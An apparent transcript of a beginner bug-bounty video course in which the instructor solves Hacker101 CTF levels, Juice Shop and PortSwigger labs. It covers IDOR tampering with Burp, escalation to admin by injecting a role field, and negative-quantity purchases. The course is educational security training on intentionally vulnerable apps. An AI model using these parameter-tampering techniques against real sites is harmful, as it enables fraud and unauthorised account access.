blocked. However, for me, if I go ahead and I use my keyboard to right click, if I hold down control and hit the right click or click, then it works for me. And so my right click is available through using control, and then I do the exact same thing. I go to view page source, and then once in here, we can look through our code, and then they've got it commented out. The password for Nodus 2 is, and then here's our password. Now this may seem really easy, but you will actually find people who have put in these comments in the code of a username or a password or an API key, and they just have forgotten to delete it. So they'll put them in here while they're developing the site, or while they're writing their code and they need to remember their username, their passwords, their APIs, other sensitive information, and you will actually come across it just being hard-coded right onto the site. And so that's why we check the code, and sometimes you will find you will really find something just like this, a username and a password. These seem very easy, but they're also very practical, and they're something you will come across pretty regularly. And so I guess I shouldn't say pretty regularly. You will come across them. Most people will have already reported these. This is why it's important to be one of the first ones on a site to pick a specific target and make sure you keep up to date with what's coming out new on different domains and different subdomains as you continue to work through different programs and your bug bounty hunting. So we'll go ahead and copy this password. We'll come back to our main site. We'll type in Nodus2 and we will type in Nodus2 and paste our password. I'm going to not save this. And then here we are again. It says there's nothing on this page. That should give us a clue. Everything we need to know to solve this challenge, we have already covered previously. I think there's a little more to it that will cause us to need our critical thinking skills, but we have covered everything needed to solve this challenge. And so I'm going to go ahead and give this a go, and we'll go over the solution in the next video. Okay, how did that go? Hopefully you were able to solve this challenge. I'm actually going to show us a couple different ways that we could solve this challenge just so that we have a more rounded understanding of how the URL works and how different files and different directories are included into domains. And so with that, I think by now you probably know what we're going to do. We're going to go ahead and right click. We're going to view the page source, and we see here's where it says there is nothing on this page. And so we can look through everything in the header, doesn't matter, isn't relevant to us. And so all that's left is this image, and then we have a link. And so what we can do is we can go ahead and copy this, and we're going to paste it into our URL. And so as we paste this, we can go ahead and hit enter and see where it takes us. And when I first solved this, I went right here, I saw this, and I went and I checked to see if I could inspect the element to see if there was anything else on this page other than this picture, or maybe there was something inside of it that would help us. And when I was looking here at the URL, I noticed that this is a file or an image, and it's inside of a directory called files. Now, if you remember, we can actually go back directories, and you can actually just delete the pixel.png, and it will take you to the previous directory, and here it is. Or we can go back, and just another way to see this is you can do just like we learned in our home folder or in our Kali Linux terminal. You can have your slash, and you can go // and you can hit enter, and that will take us back one file or one directory. And so we've already viewed the pixel, and now we've been in the parent directory, but now we can see this users.txt. And so we can click this, and it'll take us into a new file, and here's usernames and passwords. And so you have Alice, Bob, Charlie, and then here's Nodus3. So this would be our username, and here is our password for the next challenge. And so we've seen all of this before. We have seen that we can find in our source code things that don't show up, or hidden files or hidden images. And so we've seen this before. So I hope that you would have copied this and have pasted it. And we've also seen what's called the directory traversal, going back or deleting and moving into different files and different directories. And so I hope that you were able to solve this challenge. And so we'll go ahead and get set up for the next challenge. And so we can come back to our original page, go ahead and type in Nodus3, type in our username, paste in our password, and click. I'm gonna not save it. You can save it if you want. And then it says there is nothing on this page. And so this is the same as we have just found. I'm going to go ahead and turn you loose and see if you can solve this challenge. Okay, in the next few videos, we're going to be going through a couple of different PowerPoints. The reason for this is I think it's really helpful for us to have some kind of foundation before we begin looking at examples. I think by the time we get through the PowerPoints, you're going to be a little confused and probably still not know what exactly we're looking for or what's going on. But my hope is that with the PowerPoints and then just a couple of examples, you'll be able to start finding some of these bugs on your own. And we're going to be practicing on Hacker 101 as well as Juice Shop, which we just downloaded. And we're going to be looking at how to use burp before we begin looking at trying to exploit some of these vulnerabilities. I think that you will be using burp a lot, and so it'll be helpful to go through and kind of look at how it works and explore just a couple of its functionalities before we begin our exploitation of some of these vulnerabilities. And so we're going to be looking at IDORs, business logic errors, and we are also going to be looking at manipulating user input and cookies and tokens as well as we continue in this course. And so we're going to begin by looking at insecure direct object reference. These are called IDORs. That really doesn't tell us a whole lot, but they're really simple to understand once we get going. And so these IDORs are going to be just parameters that we can change, so that we can bypass specific functions on a web app. With IDORs or business logic errors, you can bypass payment options, you can reverse payment options so that you're the one getting paid, you can put things into other people's carts. There's a lot of different ways you can use IDORs, and when you're out hunting on your own, you're going to have to be creative because there are many different ways that you can exploit IDORs. You can skip login pages, you can access someone else's account. I personally, one of the first bugs I ever found was being able to write on someone else's social media platforms. It was actually just one platform, and there was just one specific area of the web app where I was able to change an ID and write on someone else's wall of their news feed. And so that is an example of an IDOR. You can also leave feedback on someone else under someone else's name. You can edit another person's blog or their post. And so these are just examples of IDORs and different ways that you are going to be able to find them. And IDORs and business logic errors are going to be the most common bugs out there, which is a great thing because it makes it easier for us to find them, and they are easy to find as well. And so these are something I think we should learn very well, and we are going to have a significant amount of time to practice these because there's actually a lot of different areas and ways to practice these, especially in Juice Shop, which we just downloaded. The best way to test for these, and I think the only way, is by creating two different accounts. It is always good to create two different accounts because you will have to test in real life against your own accounts. You cannot test on someone else's account, so you can't write actually on someone else's wall. This would be out of scope, or you can't leave feedback as a different user. These will always be out of scope. You don't want to ever mess with the functionality of the application or the people who use it. You will only use your own accounts to test against, and it also makes it easier to use your own account because you already have a second ID number that you can use on your attacker account. So you'll have an attacker account and a victim account that you will use, and so you don't want to test on someone else's account. An example, or a simple example to remember, is to look for hidden inputs. You'll actually see this as well in burp. When you create an account, it won't say input type hidden, but you will see such as a name and your username, and it will say, are you an admin? And then it'll say
value no. An easy way to show one of these errors is just to change this value to yes or true, and you will automatically have admin privileges. And we're actually going to be able to test this out in Juice Shop, something just like this. So you'll get to see this in action. And so we're always looking for parameters and things that we can change to get us somewhere that we should not be. And one of the other places that you will find iDoors is in cookies. A lot of times cookies and tokens will host user information. So that's how websites will keep you authenticated. Not all of them, but some of them will be through cookies. And so you will have inside cookies, maybe you'll see something in your cookie like user ID and then a number. And you can change the number to something else to see if you can access that account. For example, if you had two accounts, you would take the user ID of your victim account and you would replace it on your attacker account and see if you can access parts of that application that you shouldn't under another user. If you were getting malicious with this, you would change the value to 0 or 1 and see if you could gain admin privileges to the web app. And another way to test for this is to see if you can log in, save your cookies first or your tokens, and then log out, and then see if you can log in and delete your previous cookies or tokens and then repaste in your new ones and see if they have been terminated or ended. If they haven't, this would be a logic error, because when the session has ended, so should the cookies or tokens. And so you can see what to manipulate and where you can manipulate different things within cookies and tokens as well. These aren't specifically iDoors, but they're similar. They're similar enough that I think they can be included together. And so when we're testing, we're going to be using burp. This is going to be where we're at the most. Sometimes you will be able to see these in a URL. For example, if we have this example here, www.website.com, and let's say you have an invoice, you just purchased something, and it says your invoice number is 12. In a URL, you can just change this 12 to an 11 and see if you can access another customer's invoice. And if you could, this would be a sensitive information disclosure. It's something you shouldn't be able to access. And that would be a simple iDoor. I think they're easier to test for in burp because it's all laid out for us, as we'll see in the coming videos. And so also another example would be you can upload images or resumes, like on Indeed, you can upload a resume. And you can see in the URL, if you pull your resume, so let's pretend this is Indeed, and it says www.indeed.com, and then it's got a slash, and it says resume equals 87, and that's your resume. You could change this and see if you could access someone else's image or resume, just like you would have with the invoice, and see what you can access. But remember, out in the wild, we are testing our own accounts. And so I actually have an example here for us. I pulled off of HackerOne of an iDoor that somebody actually has found. And so we'll walk through exactly how he pulled this off. And so he goes to the website. Remember, creating two accounts. He has a victim, logs in as the victim. He creates a blog on the site. He saves it. And then what he ends up doing is going into the victim account or the attacker account, and he does the same thing, makes the blog. And then from there, he clicks the save button and then goes to the edit user profile and saves it, opens up burp. And then what happens is he can change the ID with the victim's ID. And this would be a clear iDoor accessing something that you shouldn't be able to. And we've seen things similar to this with the URLs earlier in changing URLs. And then he forwards the request to go to the victim's account and the website information. And you can see that it has changed. And so this is an example of an iDoor. I think we'll be able to make this sound a whole lot easier once we're actually walking through them.
And so I want to go and talk a little bit more about cookies and the URL and what exactly we can do with them. Then we're going to look at how to use burp to find iDoors, and then I want to turn you loose and let you try and find an iDoor on your own. So I'll see you in the next video. Okay, in this video, we're going to talk about a little more about URLs and what we can do with them, cookies and tokens, and then we're going to look at something called CyberChef, and then we'll move into burp and exactly how it is going to help us in its functionality. But before we get there, I was talking with my wife and I just said, hey, I think I'm going to have to warn all of the students that my PowerPoints are going to be full of errors because I actually made them just for bullet points for myself, and I was going to keep them on my second monitor, and then I realized I didn't have anything to show you and I wasn't just going to have a blank screen. So if you're wondering how can somebody with a PhD have such poor quality PowerPoints, they were originally just my notes. And so I decided rather than sit here and comb through them and go back over it, I will just show you. This is basically what my notes look like when I take notes, and walk you through them just so we can have a better understanding of a few more exploits before we move into burp. So first, changing passwords. You will actually come across this in Juice Shop when we are practicing, and more as we get further into the course. Sometimes you will see a URL that looks similar to this, or in burp, it will pop up at the bottom of a post request, and we will have something similar to this, like a change password. You will have the username, and then the new password will be stored right here. And in something like this, you could actually grab someone else's username and on your victim account and try and change the password to it and see if you're able to pull that off. Or you can go ahead and see if you can maybe delete your victim account by, instead of having change password, you'd have delete account or delete user or just delete. And then you can put the username here, and you would obviously not have the password. You will also in burp be able to have delete instead of, you'll have put, post, delete options, and you can try and delete the account through burp. And if you are unable to, even if you aren't able to pull any of that off, if you have a URL that has a username and a password in it, even if it is encoded with something as simple as base64, this would be an information disclosure. And we'll get to why this would be an information disclosure in just a few slides. Okay, we talked about this a little bit in the last PowerPoint in the last video. If you have a website, something similar to this, which I actually just copied this out of the OWASP guide and the OWASP pen testing guide, as well as another image that we're going to come to here in a second. Sometimes you'll come to something like this. If you are logged out and you copy and paste in a URL that requires you to be authenticated, and it says authenticated no, and it does not allow you to view the site, you can just change this authentication here to yes or true and see if you are able to access the site and see what you can gain access to. And then we can check the logout functionality. And this is why it is an information disclosure if you have a username and a password in the URL, because it is possible for you to log out on your computer and then close the browser, and you'll be able to open up the browser and it has cached the previous page that you were in, and you can go back into the history and open that page. And if it opens, even if you're not able to go to any other links because you're not authenticated anymore, but if it opens that URL and your username and password is in there, it would be an information disclosure. Or if you log out and you don't close the browser, it's possible to hit the back arrow or the back button and go to the previous page. and have the information there. And this can also be more than just information disclosure. If you're able to hit the back button after you've logged out and then browse the site again and it re-authenticate you. This is something that's listed in the OWASP guide. It's something that happens. It's not very common, but it's something to check for. And you might be thinking this isn't a very big deal, because that's what I originally thought. I was thinking this isn't really a big deal because when you try to explain this to a program, they're going to want to know, how is this impactful? How can this be used against us? And at first, it isn't really a big deal if it's on your computer. If you can hit the back arrow and access your own password and username, it's not a big deal. Or even if you hit the back arrow and it re-authenticates your session and you're able to browse through whatever site it is. But it is a big deal if you're at a public library or you're in school and you're on one of your school computers. It is a problem if you're in a public place. Even if you log out and you go back, some other person can access this information. And so if you're wondering what the impact of this is, that would be the impact of not having the proper configuration here with the authentication. Cookies and tokens, we've talked about these several times now. Most websites, I would say probably every website we're going to come across, especially when you have to prove authentication, meaning you've logged in, is going to have cookies and tokens. And there's going to be several ways that these can be manipulated and vulnerable. We've already seen a few of them, such as cookies storing usernames and passwords for your authentication. You'll be able to look and see if the cookie is in the URL. And if it is, this could be a problem, especially if you are able to crack the cookie, which I'm going to show you in just a second. A good way to try and do that without actually knowing a whole lot about different encryption methods. And the reason that this is an issue is because it is similar to the previous ones. It's information disclosure. Someone else can access your session or your account. And so reusable tokens can also be an issue. One of the ways you can test for reusable tokens or reusable tokens, or even if you can predict future tokens, is by logging in and out several times of the website and copy your tokens and your cookies and save them in a document and see if there's any pattern, and if you can guess future cookies that might possibly be issued. This is a problem because you could hijack someone else's session just by taking their cookie and replacing it with replacing their cookie with your own. And then one of the places that you will go that is probably the most helpful, especially being new and not being able to recognize like MD5 or base64 or different types of encoding, is going to be CyberChef, because CyberChef will do this for you. And this is CyberChef. And so what you would do is you can actually come over here and just type in magic. You drag it over into your recipe, and it will automatically try and sense whatever you have, whatever encoding you are trying to figure out. So what we'll do is we'll actually just do an example real quick. We'll type in base 64. We will come over here. We'll actually can that base 64, and if we had a username, and this is base 64 encoded, you will almost always notice base 64 encoded with the equal signs at the end. And so we have our base 64, it's encoded. Let's say you come across that and you don't know what it is and you're struggling to crack the cookie. What you do is you can just come over here and paste it into the input. You can come over here and go magic and pull it over, and it should be able to detect that this is base 64, and it will give you, I spelled username wrong, it will give you the username. And so you don't actually have to try and work to crack these. You can just come over here, type in magic, paste it in, and if it can be cracked, CyberChef will automatically put this out for you. This is a great and easy tool to use when trying to crack cookies. So in the next video, we're going to give a look at burp in Postbook, which is Hacker 101 CTF. And we're going to look at some of the functionalities in burp, and then I'm going to see if you are up to the challenge in trying to find an IDOR all on your own. And it might take a little bit of time. It's not a very complicated capture the flag, but it might take a little while because it's going to be one of your first times using burp, trying to find an IDOR, and then it might take just a little while to click around within Postbook and try and get the hang of what it's doing, what's happening in the URL, and what you can intercept. And so all of that's coming up and more. I'll see you in the next video. Okay, we are going to, in this video, go through some of the functionality of burp. And so I'm going to go ahead and have you navigate over to Hacker 101 and get into their CTF. And we're going to open up Postbook. And you can go ahead and click go and pull it open. And when you're there, the first page you'll come to will look like this. And so we'll go ahead and come over on burp. You can turn your intercept on and make sure that you are sending all of your traffic through your proxy by coming over here. We'll go to preferences, scroll down to settings, and make sure that you have manual proxy configuration, and then it looks like this. And once you have that done, you can click OK, and your proxy should now be set up to intercept your traffic. And just to give it a test, you can refresh the page and make sure that it pulls through here, and you can forward all of the requests we intercept, or you can just turn it back off and then turn it back on. But we are going to come in here and we are going to sign up. And so we'll go ahead and click sign up, and you can just see what's going on in here. We have our sign up.php. You can see it's pulling that from our URL. We have a get request. We'll forward that, and we'll come back over here, and this is where you're going to make your username. And we can just type in test, and password can be test, and you can submit your query. And then in here you can see your username and your password. And if you wanted to actually try and mess with this and see what we can do with it, we would send it to repeater. So you just right click and click send to repeater. And over here we can send this request as many times as we would like to. And so in here we can change the username and click test1 and then send it, and we are getting a 302 in response. So let's go ahead and shut this off and see we have successfully signed up. And I think we actually created the test1 account as well. Yep, so we have made the test account and the test1 account. And while you're in repeater over here, you can see that this would be not a very secure way of submitting these things. You will actually come across this really regularly, pretty regularly, even on large, very common websites. And you can see what you can do here. You can try and manipulate things and see just what you can do, and maybe type a get request and change to a different URL and see what response you get over here. There's lots of things you can do. And in repeater, you can send this as many times as you want to the server, and really just try and figure out if you can get anywhere that you shouldn't be with this. And so we're going to go ahead and come back to our proxy, turn it on, and now we are going to just create a post. We'll go hello world, create post. We have a user ID of 5, and remember, every time we see ID we should be thinking IDOR. What can we change? Where can we go? What can we get with this? and we have the body of the message over here. We have a cookie over here. You could bring this over to CyberChef and see if maybe there's anything in there. If you remember, we just go magic, and then we would paste it in, and you could see we didn't get anything out of our cookie. And so that's okay. We would come back here, and we're in our burp. We can send this to repeater again, and one of the things you could try and do is see what you can delete the cookie, see what you can do with this, and see if it still works. And it says we get a redirect. You can follow the redirect and then come down here and see what your response is, and it says we need to sign in. So you have to be authenticated, so the cookie is necessary, something that we have to have in order to continue on for authentication purposes. But as you can see, this is kind of how I would just go about testing at the beginning, is just see what I can do with this ID, what I can do with burp with a body, see where I can get, where I can go, see what responses come back. And with that, I think I've given you a pretty good clue here with this user ID. There is an IDOR in Postbook. I'm going to give you the challenge now to open up burp, come in, make an account or 2 accounts, and see if you can find the IDOR, see if you can find the flag, and see, just get used to playing around with burp, get used to playing around with repeater, and see if you can find any of the flags. I'm going to go ahead and shut this video off, and we'll start up in the next one, and we'll walk through the process of finding the IDOR in Postbook. So good luck with that challenge. Okay, before we go ahead and solve this challenge, I want to introduce you into one more functionality inside burp that is going to be helpful in the future as you're doing bug bounty hunting, and that is the intruder mode. So right here in intruder, one of the things we could do with intruder is, as we come in here and we just refresh this page, we have this ID of 6. Let's say there are 1,000 different numbers in here. What you can do is send this to intruder, and it will actually go through these numbers for us. So you can come over here and you can go to position, and we will clear this, and you'll highlight this number 6. And what it does is it will go through every number we specify in here and replace that number 6 and then give us back the response. So we can come over to our payload, and we can go simple, we can do a simple list, and then we will put in just numbers. We'll do 1 through 10, so you just go 1, 2, 3, 4, 5, 6, 7, 8, 9, 10. And now we have just a simple list, and we have just the one position, and we're going to go ahead and run through these numbers. And so what you do is you click Start Attack and go OK, and it will automatically replace that for us. And then we can click on these and see what we have in the response. And you can come through and see if we have found anything in here. It says write a new post, my profile. It doesn't look like anything. Oh, private, this is for my own eyes only. Number 2. And we see the same thing. And this one actually has someone put in actual content, and then you can go down to number 3, and you can see how this would make it easier, so you don't actually have to go through and do 1, 2, 3, 4 manually. You can, but you don't have to. And so what we would do if we wanted to get more malicious with this, as we're looking for an IDOR, we can come back into our proxy here, and you can turn it off, or you can use burp. I'm going to use the URL just because it's what we're used to. But I would encourage you to actually try this with burp. I'm going to show you how I would do it with the URL, and then you can actually come in here and see if you can run this exploit and find the flag with burp and without using the URL. And so what we do is the exact same thing. You can come in here and you can just go 1, and then somebody posted this. It's not private, it's to the public, and you can come here and you can type in 2, and this actually has the checkbox. Yes, this is my own eyes only. And so this would be something that is not supposed to be seen by everyone, and so this would be considered an IDOR. If this was an actual program, you could report this as an IDOR. And not only that, you can write inside someone else's entry here, and then you can save the post. And in saving the post, I am not actually sure why there are 2 flags, maybe one for writing on someone else's wall and one for the IDOR. I'm actually not entirely sure, but you can see the author was also an admin. So we made it beyond just a regular user and into an admin. And so this is how IDORs work. We're going to be moving from Postbook into Juice Shop. And the way I want to work through the Juice Shop vulnerabilities is by giving you just little hints, maybe telling you what part of the application there is a vulnerability, and then setting you free. And after you have spent a significant amount of time and you're starting to get frustrated or you want a clue, just continue watching the video, and I'm going to work through some of these vulnerabilities step by step. But I want you to give it a shot and try and figure out where the vulnerability is and see if you can solve the challenges on your own. And only if you're really struggling, come back and get another clue and then pause the video again and see if you can figure out the rest of the challenge on your own, kind of like we have been doing. But from this point on, it's going to be a lot more difficult for me to show you very specific vulnerabilities on multiple websites, because at this point, Juice Shop is going to be our main place of working, because there's not a whole lot of options when it comes to practicing specific vulnerabilities and then me showing them to you. So I want to give you clues of where they might be located in the application, and then set you free to try and exploit them, and then only when necessary help you with another clue. And so with that, you can actually continue playing around in Postbook and see just what else you can do in finding IDORs. I want you to get really comfortable using burp and sending things to repeater, getting comfortable with like modifying the cookies, deleting the cookies, changing IDs, and just seeing exactly how it works. And you're going to be getting more comfortable with it as we go on. But really all we're going to be focusing on is the cookies, the get and post requests, and then also there will be some more additional information down here, such as we saw when we were creating a user. You saw it say ask for a username. We gave it a username, a password, and so forth like that. And those are really, we're not going to pay a whole lot of attention to a lot of this other stuff right now, because it doesn't really apply to our skill level at this point. And so with that, I will see you in the next lesson, where we will be opening up Juice Shop once again. Okay, just a few more housekeeping things before we really begin performing a lot of exploits and going over a lot of things that we've already learned, and really trying to solidify this information into our memory. If you still have npm running and you have your server going, in order to close that, you can hit Command C, and that will get you out of a lot of really sticky situations. If you ever don't know what's going on and you're struggling and your cursor's hanging, you can just hit Command C, and that should close out anything you have running on your Kali machine. You don't want to just close a tab. So if you have 2 tabs open and one's hanging and it's really causing you a lot of trouble, you don't want to close it, because if you have an open port, you won't be able to use that port again, and you'll have to restart your your whole machine. So you'll want to use Command C. And so if you remember, to start up Juice Shop on your local machine, you need to you need to change directories into your downloads, because that's where we save the file. We can list them, and then we need to cd into Juice Shop, because npm will boot up the files that are in here, and it needs to be inside this directory, otherwise it won't work. And so we go npm, and then we start, and that will open up Juice Shop for us. And it's now listening on port 3000, so it is up and running. But you will notice that if you have burp running and you turn your proxy on and you start clicking on things and you refresh the page, burp is not intercepting anything. It is not working for us. So we need to configure our traffic so that it goes through our proxy, and we're going to do that by going over here, opening a new tab. We will type in about config and hit enter, and I will warn you to proceed with caution, because this will change how your browser functions. So you want to accept the risk and continue, and we are going to type in network dot proxy, and this one right here, allow hijacking localhost. We'll click this, and we need it to change to true, and then we can go ahead and close out of this tab. And now if we refresh our page, you can see that our traffic is running through burp, and we are able to intercept the requests. And now with that, in the next video, I will lead you to our first vulnerability that we are going to begin working through. I will see you in the next video. Okay, we are ready to find our first IDOR on our vulnerable web application. So you can come in here and try and find it on your own, or I can give you a tip on how to get started. And if you want to try it completely on your own, you can go ahead and pause the video now, browse the application, and intercept your traffic with burp and see if you can find the IDOR. Okay, your first tip is going to be that we will find the IDOR in leaving customer feedback under someone else's user. So you can go ahead and try and find that now if you want, or keep playing the video for the next tip. Okay, the next tip is going to be creating an account. I already created one. I figured you didn't want to sit through me creating an account, so you can actually just come up here, click on the account setting, the account tab, go to login, create a login, and once you're logged in, try and find how you can leave feedback as someone else. We are going to go ahead and solve this challenge. If at any time you feel like we have gone far enough and you have enough clues, you can pause the video and try and solve it on your own from that point forward. But we're going to come over here to this menu. We are going to click customer feedback. Now, I want to give you another helpful tip. If math is not your strong suit, you can actually open up and inspect the element. You can come to network, and then you can refresh this. And in our network, we will get a whole bunch of GET requests, and we will look through and find the one. Since this is called CAPTCHA, we're going to find the one that is labeled with CAPTCHA, and in there it will have for us the answer. And you see this request. We're going to look at the scoreboard at the end of this video, and I'll kind of talk through what this is, but we're going to go to this as soon as we solve this IDOR. But as we continue scrolling through, and we're looking for the captcha right here, you can go to the response, the request, the cookies, the header. It's not the header. I believe it is the response. Our answer is going to be 11. So it will solve for you whatever math problem you have. And that's the easiest way to get through these. And so our answer is going to be 11. It has our user name. We can leave a comment. I like to just leave hello world. We will give it a rating, and then make sure to intercept when you submit this. And so we'll hit submit, and now we have our user ID. If you want, you can go ahead and pause the video and see if you can figure out what to do from here. What we will do is we're going to send this to the repeater. We can come up here, open it up. We can send this request to make sure it goes through. It says it was created, so we have successfully left feedback. But we want to leave feedback as someone else. And so what we do is we can change our ID to, let's just go 14. Just pick an arbitrary number that's less than the one we were using or the one we were assigned. And then we can send it, and it says it was created. So now we should be able to turn off our proxy intercept, come back to our web application, and it tells us we successfully solved the challenge of forging feedback. So this is an example of an IDOR where we are leaving feedback under some other user's name. And now I want to go to the scoreboard real quick. This is where you can see the challenges. I think it's spelled this way. Our scoreboard. And you can see all of the challenges that are available on this web application. We are not going to be going through all of these. We're just going to be going through a few of them, the ones that are specifically tailored to this course. Some of these are really advanced. Some of them we will come back to and we will solve later. But for now, we're going to walk through the ones that I believe we have covered a sufficient amount of material in this course for you to solve on your own. And so with that, I will see you in the next lesson. All right. I was playing around with the comment section in the products, and I realized you can actually leave feedback as someone else other than coming over here to our customer feedback. You can actually leave feedback from a different user right here on these products, and maybe you actually figured that out in the last one, and if you did, that's awesome. And if not, you can go ahead and try and solve this challenge on your own, and then we will go through it together. So if you want to give that a shot, you can go ahead and do that now. Okay, we are going to just open up one of the items that already has a review so that we have a name that we can leave feedback under. And what we'll do is come over and turn on our intercept and type in some kind of message, and then we will submit. We'll come over here and see if we can find it. And here it is. We can send this to our repeater. You can come over here and send this, and it says it was created. So we have the message, and then we have the author. So instead of having our name in here, we can put in Bender at Juice Shop. Was it dash I think that is how it was written. And then we should be able to send this, and we'll actually just put in something else here and send it, and it says it was created. We'll turn the intercept off, and you can see here it was created under someone else's name, and it actually says we have successfully completed the challenge again. So there were two ways to accomplish this within the Juice Shop application. And we will continue on with our manipulation of text within Burp in the next video. I'll see you there. Okay, our next challenge is going to be one that we have talked about, but we have not actually seen, and I have not come across any vulnerable web apps to actually test this on and show it to you, but we have talked about it, and you might have to use some of your Googling skills, or just if you get stuck, follow along with the video and get a hint before you move on. But we're going to create an admin account, and this is something that is very possible that you will come across. It's not very common, but it does happen that you can find ways to create an admin account or escalate your privileges. So we're going to go ahead and make sure our intercept is off, and what I need you to do is go ahead and create an account and see if you can figure out how to get the account enrolled as an admin. And so you can go ahead and try that now. Okay, I think what I will have to do is log out, and I'm going to make a new account just the same, and I will come in here and go not yet a customer. This time we'll go and be John at john.com. And as soon as you get this done, we will turn on our intercept and we will register the account. Now what we're going to do here is we're going to send this to repeater, and over here is where we'll work on escalating the privileges to an admin. So we'll send this, and just to get a response to see what we have here. So our role is a customer, and this tells us that we're going to need to change the role. And so I actually just did this a few hours ago. I was just working through the application, and I'm going to show you exactly what happened to me, because this will give you a really good idea of just the trial and error that we go through when we're testing applications. So I came in here, I typed in role just like this, and I typed in admin. And if you send it, since this user has already been created over here, we're actually going to have to change this to 1. And if we send it, we can see we've now created another user, but the role is still customer. And so I changed this to administrator, and it still didn't work. So I tried to change this to user admin, and then change this over here again, and we are still a customer. And I've tried user, I tried admin, I tried administrator, and finally what happened was I deleted this, and I came up here and I tried to just move our input to see if that would make
a difference. And I typed in admin, just the same as before, and that looks good. And we'll change this to a 3, and then we will send it. And now you can see our role is now admin. So we have created an admin user. So if you take this user with this password that you just made, you can log in and browse the Juice Shop application as an admin. And so you'll actually see things like this in the wild. They're uncommon. You can actually go on HackerOne and read the hacktivity and see where people have actually got this to work. And you can see, just read the articles and read the submissions to observe how people have pulled this off. Some of them are going to be more complicated than this, but some of them really will be this simple. And so with that, I will see you in the next lesson. Okay, what I need you guys to do for this next lesson is go ahead and open up a new tab. And up here, we're going to go to Portswigger, and you can go ahead and search for it. It should be the first one. And we're going to open it up, and we're going to move over to the login button. I've already created an account, and so go ahead, click on login, create an account. We're going to need it, especially in the coming lesson. So go ahead, click the login button, make an account, and I'll see you once you're logged in. Okay, once you have reached your login page, go ahead and click on Academy, and then go to All Labs. And once this loads, we're going to go ahead and scroll down until you find business logic. And I believe it's pretty far down in all of these labs. And so scroll down to our business logic errors, vulnerabilities right here. And we're going to be working through these right here. And so let's continue going forward. So these actually say solve because I already made the videos for these, and I realized that I never actually explained how you guys should get here and get to these labs before I started filming these videos. So I'm going to edit the video, and these are going to turn into unsolved. Okay, we are going to look at a few business logic vulnerabilities. And so these are very similar to the IDORs that we have been looking at. And so we're going to go ahead and just start here with this one right at the top. So you can go ahead and click on it, and we can look and see what exactly they have for us. And it says that it doesn't validate user input, and we're to buy this lightweight jacket. So you can go ahead and open up the lab, and this is where it brings us. It said we needed to log in, so we will go ahead and do that. And it gave us the login credentials, so we'll log in. And now we are supposed to buy this jacket. So I guess we can go ahead and view the details and add it to the cart. Let's actually come in here, turn the intercept on. We'll add it to the cart, and it tells us our price right here. And I don't know exactly how much we're allowed to spend, but I think we should be able to. Let's see if we can make this a negative number. And we'll go ahead and forward that. And then we'll just turn that off. And it did not add it to our cart. We have $100 to spend on this jacket. And this jacket is way over $100, $1,300. So we'll go ahead and see if we can turn the intercept on, add this to cart, and let's just change our price here and see if that works. Okay, we're allowed to add it to our cart. So we have no need to apply a coupon,
and we should be able to place our order. And it says we have solved the challenge. So things like this and business logic errors, IDORs and business logic errors, they're going to be things that you have the opportunity to find. These are pretty common that you'll find these business logic vulnerabilities. They happen when developers get lazy or they're just not really paying attention to what they're doing. I've actually seen really advanced developers make very simple mistakes that made their web applications vulnerable just because they weren't paying attention. And so you can find these. They're pretty common. I know there's at least one bug bounty hunter that this is all they do. They look through burp, they look for business logic errors and what they can change just to find stuff that they shouldn't be able to, and find vulnerabilities. These are pretty simple and they do take a long time to find, but you can find them just by doing really simple things, by just changing numbers and inputs. Sometimes you will find stuff that has been encoded. It'll say, like, you'd have the lightweight jacket. Let's actually go back. I'll just show you. Sometimes we will add things to our cart like this, and you would have this, it'd say price, and it would look like this instead. We'll encode it, base 64. You would have this sitting inside your price instead of that number. And so what you have to do, if you see something like this, you'd have to take this and you would come to your decoder, or you can go to CyberChef and you can put it in and try and decode the price. You're rarely going to see it where it's just a plain number, but this is way more common that you would just see a number here and that you would have to decode it. Sometimes these prices will be stored in places other than just something plain and simple like this, and so it's something that you're going to have to look for and poke around. They do take a while to find, but you can find them right off as a beginner who knows very little. And we're going to look at one more, and then I want to send you off on a challenge and see if you can find a business logic error on your own. I'll see you in the next video. Okay, it is time for your challenge. So if you navigate over to Juice Shop and get it running, what I want you to do is try and solve the challenge to where you actually are being paid $200 or $300 or $400 or more from this application. We just worked through 2 labs that are similar to this, so you can go ahead and try and solve this challenge, and when it's done you should get the green bar at the top of your screen that'll tell you that you have completed the challenge. So I want you to go ahead and pause this video and give that a try. Okay, how did that go? We're going to go ahead and walk through this in the same manner in which I would solve this. So go ahead and add something to your basket, and then we'll check our basket. And then at this point, what I would do is I'd go ahead and turn the intercept on and walk through the whole checkout process and see if there's anywhere that I am able to modify, and see if I can modify this in any way, shape, or form. And what I think I'm going to do is I don't actually want to walk through and have you watch me put all of that information in just to solve this challenge. So we'll go ahead and see if we can actually modify this before we get there. So it says we have basket ID of 5. We're buying product number 4. Let's see if it will let us do what we did in the previous challenge and put in a negative amount. Let's try 99, and then we'll turn the intercept off. It says we were able to add those to our to our basket, and they're going to pay us. That didn't work. Okay, they're going to pay us if we do that. So we'll go ahead and we'll try that again. $100 wasn't enough, so we'll come back to our products. We'll add to our basket. I forgot to turn burp on. We'll add this to our basket. We'll forward. Here's our quantity. I wonder if the rest of our content's at the end of this string. Well, we have our quantity, so what we'll do is we'll type in negative, and we'll do 200 this time. And we'll forward that, and go to our basket, and that's more like it. We're gonna get paid $400. So what you do at this point, I'm gonna just walk through the checkout process. You'd add an address, and then you'd complete your order, and that should solve the challenge for you. So rather than having you watch me enter all of that information, that is how we would solve this challenge, and I will see you in the next video. Okay, we are going to continue with the business logic vulnerabilities. We're going to go ahead and open up this second one, and after this one I'm going to set you loose on a challenge. So what we'll do is we'll go ahead and open this up. It looks like the same as the one before. We need to buy this jacket, and we have our login user right here. So we'll go ahead and log in, and we'll try and proceed with buying the jacket. Okay, here's our jacket. So we'll go ahead and view details. We'll add it to the cart. We're going to do the exact same thing we did in the last one, and I'm going to do it the exact same way by starting out. Oh, we don't have a price. So we got our product ID, our product, and here's our value. Let's get 2 of them, and I'm assuming we have the same amount of money in our cart as we had the last time to spend. So we'll go ahead and just put the negative sign in front of the 2, and we'll see if it allows us to put in a negative number. And we were. So in our cart, if we go look at it, it says we have negative $2,600. That means they are going to pay us. See if it'll go down by using these buttons. It does. So you wouldn't even have had to have done this in burp. You could have just come over here and click this button, and it means they're going to pay us this amount of money. So when we place our order, we're definitely going to be able to buy our jacket, and our store credit is going to increase. Oh, our price is not allowed to be less than 0. So they have at least they have that in place. So we'll go ahead and okay, made our cart empty. We're gonna have to go back and put that back in our cart. So what I think we'll do is we'll add this to our cart as well. I'm not sure how many of these we're gonna have to add. We'll go 